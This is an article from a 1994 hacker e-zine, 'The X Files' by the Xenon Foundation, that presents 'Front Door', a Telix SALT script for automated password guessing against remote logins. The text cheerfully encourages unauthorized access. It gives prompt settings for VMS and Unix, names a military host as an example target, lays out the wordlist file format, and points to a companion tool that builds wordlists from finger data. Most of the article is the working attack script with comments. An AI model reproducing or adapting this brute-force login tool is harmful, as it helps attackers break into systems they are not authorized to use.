217 lines
8.4 KiB
Plaintext
217 lines
8.4 KiB
Plaintext
__
|
|
\ / |_
|
|
/ \ e n o n | o u n d a t i o n
|
|
|
|
presents:
|
|
|
|
\ /
|
|
*------ the \ /
|
|
/ \ files ------*
|
|
/ \
|
|
|
|
January/1994 Issue: 9
|
|
|
|
______________________________
|
|
/// \\\
|
|
... The Telix Script Hacker: ...
|
|
... ...
|
|
... "Front Door" ...
|
|
... ...
|
|
... Written by: Erik Turbo ...
|
|
... ...
|
|
\\\______________________________///
|
|
|
|
|
|
There are few people that recognize that there is an easy and extremely
|
|
powerful method of hacking, that you can use in lieu of manual brute force
|
|
techniques. It can be done quite simply with the Telix SALT language,
|
|
which is included in every shareware package of the popular communications
|
|
software, "Telix". Although arguably not the best in communications on the
|
|
IBM platform, Telix does have a rather powerful scripting language that
|
|
almost anyone can learn quickly, and efficiently. Since the SALT will
|
|
handle all communication Input/Output, you need not worry about looking
|
|
for any serial libraries for your C compiler (or worse yet, writing the
|
|
serial I/O yourself.), and you also won't have the annoying need to leave
|
|
your communications package for its execution; the SALT is executed
|
|
straight out of Telix. The following program is the most basic form of the
|
|
password hacker. It basically looks for certain strings to pass over the
|
|
modem, and then answers their inquiries by pulling lines from an ASCII
|
|
text file. Feel completely free to modify the existing code to include
|
|
menus and prompts (instead of hard-coded variables), as well as support
|
|
for hacking miscellaneous operating systems. As is, the following program
|
|
should take care of all your front door hacking needs... enjoy!
|
|
|
|
------------------------------- ( Cut Here ) -----------------------------------
|
|
main()
|
|
{
|
|
// 'Front Door' written by Erik Turbo
|
|
//
|
|
// Variable initialization:
|
|
// ===========================================
|
|
int stat, t1, t2, t3, t4, t5;
|
|
str pass[80], username[80], site_name[80];
|
|
str default_file[80];
|
|
// ===========================================
|
|
//
|
|
//
|
|
fclose(default_file); // LEAVE this! It closes the default_file
|
|
// in case your previous hack terminated incorrectly
|
|
// prior to running this program.
|
|
|
|
// ------------------------( CONFIGURATION )----------------------------
|
|
//
|
|
// Variable Declaration - VERY Important! Here, you have to change the
|
|
// string values of the following 'track' variables, in order to
|
|
// customize this program for the system you are trying to gain access to.
|
|
// The following is a listing of what the actual track variables denote:
|
|
//
|
|
// t1 = The login prompt (ex: 'Enter your Name:', or what not.)
|
|
// t2 = The password prompt (ex: 'Enter your password:')
|
|
// t3 = The string that implies a connection has been closed (ex: NO CARRIER)
|
|
// t4 = The string that denotes success. (ex: Access granted.)
|
|
// t5 = The string that indicates a login failure. Only necessary on machines
|
|
// that force you to press enter after a failure, otherwise it is
|
|
// meaningless and can be set to any value that will not conflict with
|
|
// the others.
|
|
//
|
|
// When hacking a dialup, set the t3 value to 'NO CARRIER'
|
|
// t3 = track("NO CARRIER", 0);
|
|
//
|
|
// When hacking from Sprintnet, set the t3 value to '@'
|
|
// t3 = track("@", 0);
|
|
//
|
|
// When hacking from the Internet, set the t3 value to 'closed'
|
|
// t3 = track("closed", 0);
|
|
//
|
|
// Now that you have your 't3' variable configured for the network
|
|
// connection, you now have to set the remaining track variables for
|
|
// the program to recognize what system you are hacking.
|
|
//
|
|
// For VMS set the values as follows:
|
|
// t1 = track("Username: ", 0);
|
|
// t2 = track("Password:", 0);
|
|
// t4 = track("Interactive", 0);
|
|
// t5 = track("User authorization failure", 0);
|
|
//
|
|
// For a Unix based machine, use the following:
|
|
// t1 = track("login:", 0);
|
|
// t2 = track("Password:", 0);
|
|
// t4 = track("Last login", 0);
|
|
// t5 = track(" ",0);
|
|
//
|
|
// There are few more variables that have to be set, to configure the program
|
|
// to hack your system.
|
|
//
|
|
// The 'site_name' variable is the actual node name, or telephone number, of
|
|
// the system you wish to hack. If you set your 't3' variable to indicate
|
|
// you were hacking off the telephone network, than set the 'site_name'
|
|
// variable to the telephone number you are going to hack. If you are
|
|
// hacking off the internet, or similar node-based network, than set it to
|
|
// the address of the system you are hacking.
|
|
//
|
|
// Examples:
|
|
//
|
|
// site_name = "999-9999"
|
|
// site_name = "norad.navy.mil'
|
|
// site_name = "617034"
|
|
//
|
|
// Hacking Information File - Contains usernames and passwords to attempt.
|
|
//
|
|
// default_file = fopen("hack.dat", "r");
|
|
//
|
|
// The 'default_file' variable is the heart of this entire program. The
|
|
// file that it points to, is the file that YOU HAVE TO create in order
|
|
// for this program to work! In this example, the file it points to is
|
|
// 'hack.dat'. 'HACK.DAT' is an ASCII file that you must write, which
|
|
// contains all account information, as well as the passwords you wish
|
|
// to attempt using. The format of the HACK.DAT ascii file is as follows:
|
|
//
|
|
// ACCOUNT1
|
|
// PASSWORD1
|
|
// ACCOUNT1
|
|
// PASSWORD2
|
|
// ACCOUNT1
|
|
// PASSWORD3
|
|
// ACCOUNT2
|
|
// PASSWORD1
|
|
//
|
|
// ... and so on, and so forth. You may have as many combinations of
|
|
// accounts and passwords as you like -- it is not limited by size.
|
|
// You, however, MUST use that format, since the program reads that data
|
|
// file sequentially, and will not know the difference between a username
|
|
// and a password. (obviously. hehe...)
|
|
//
|
|
|
|
|
|
|
|
hack:
|
|
|
|
cputs("telnet "); // CHANGE this to suit your needs. It will usually be set
|
|
// to one of the following values depending on how you are
|
|
// hacking:
|
|
// cputs("telnet "); if you are hacking the Internet
|
|
// cputs("ATDT "); if you are hacking a dialup
|
|
// cputs("C "); if you are hacking Sprintet, or a Decserver.
|
|
|
|
cputs(site_name); // This should have already been set to the address name or
|
|
// telephone number of the system you are hacking.
|
|
|
|
cputs("^M"); // Presses ENTER for you, after it sends the strings.
|
|
|
|
while (1) // Begins an indefinitive loop.
|
|
{
|
|
terminal(); // Allows for two-way communication between you and the
|
|
// remote system.
|
|
|
|
stat = track_hit(0); // Starts checking for the track variables to appear
|
|
// over the modem.
|
|
|
|
if (stat == t1)
|
|
{
|
|
fgets(username, 80, default_file);
|
|
cputs(username);
|
|
cputs("^M");
|
|
}
|
|
// Gets a line from HACK.DAT and sends it over the modem, pressing enter
|
|
// when complete. This string SHOULD be the username if you entered the
|
|
// information in HACK.DAT correctly.
|
|
|
|
if (stat == t2)
|
|
{
|
|
fgets(pass, 80, default_file);
|
|
cputs(pass);
|
|
cputs("^M");
|
|
prints(pass);
|
|
}
|
|
// Gets a line from HACK.DAT and sends it over the modem, pressing enter
|
|
// when complete. This string SHOULD be the password if you entered the
|
|
// information in HACK.DAT correctly.
|
|
|
|
if (stat == t3)
|
|
goto hack;
|
|
// That username and password did not work, so the program goes back
|
|
// through the loop again.
|
|
|
|
if (stat == t4)
|
|
{
|
|
printc(7);
|
|
printc(7);
|
|
printc(7);
|
|
}
|
|
// You got in! Three beeps from your speaker will lure you to your
|
|
// terminal if you are away.
|
|
|
|
if (stat == t5)
|
|
cputs("^M");
|
|
// Necessary only on VMS systems and similar machines that require you
|
|
// to press ENTER after a failed login attempt.
|
|
|
|
}
|
|
}
|
|
------------------------------- ( Cut Here ) -----------------------------------
|
|
|
|
Also - For a great program to be used with 'Front Door', download PASS.EXE
|
|
from Black ICE Consortium. (located in the /bin directory)
|
|
This program will create HACK.DAT ASCII files for you, and even
|
|
modify TCP/IP 'finger' files to be used by the HACK.DAT format.
|